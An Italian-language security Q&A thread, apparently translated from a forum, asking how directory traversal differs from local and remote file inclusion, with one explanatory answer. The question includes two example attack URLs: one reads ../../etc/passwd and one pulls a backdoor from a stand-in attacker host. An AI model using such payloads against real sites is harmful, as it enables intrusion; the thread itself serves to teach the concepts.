Qual è la differenza tra l'inclusione di file locali (LFI) e l'inclusione di file remoti (RFI)?

4

Basato su questa domanda precedente , sembra che la differenza tra l'attraversamento della directory e l'inclusione dei file sia la seguente:

Attraversamento directory

  • La convalida errata dell'input dell'utente conduce a accesso in lettura della risorsa server .
  • Esempio: http://www.example.com?file=../../etc/passwd

Inclusione file

  • La convalida errata dell'input dell'utente porta a il caricamento di una risorsa esterna nel server e l'esecuzione in esso .
  • Esempio: http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor

Questo link , tuttavia, descrive questi concetti usando le parole inclusione file locale e inclusione file remoto .

Quindi, è il primo esempio

  • directory traversal e inclusione file

lo stesso del secondo esempio

  • inclusione di file locali rispetto all'inclusione di file remoti

vale a dire. LFI / RFI è solo una terminologia diversa per la stessa cosa?

    
posta Zach Valenta 05.12.2017 - 17:59
fonte

1 risposta

3

La tua confusione deriva dalla tua ampia comprensione del traversal delle directory.

Traversal significa che si può leggere da un'altra directory. Non specificamente che si può leggere un file.

LFI sta leggendo un file locale, nella directory di lavoro corrente o, usando attraversamento, un file in un'altra directory.

RFI include un file da una fonte esterna.

È possibile avere una vulnerabilità LFI senza che vi sia una vulnerabilità di attraversamento di directory (file locali nel contesto corrente). E, tecnicamente, è possibile che ci possa essere una vulnerabilità trasversale che non si traduce in una LFI.

    
risposta data 05.12.2017 - 18:46
fonte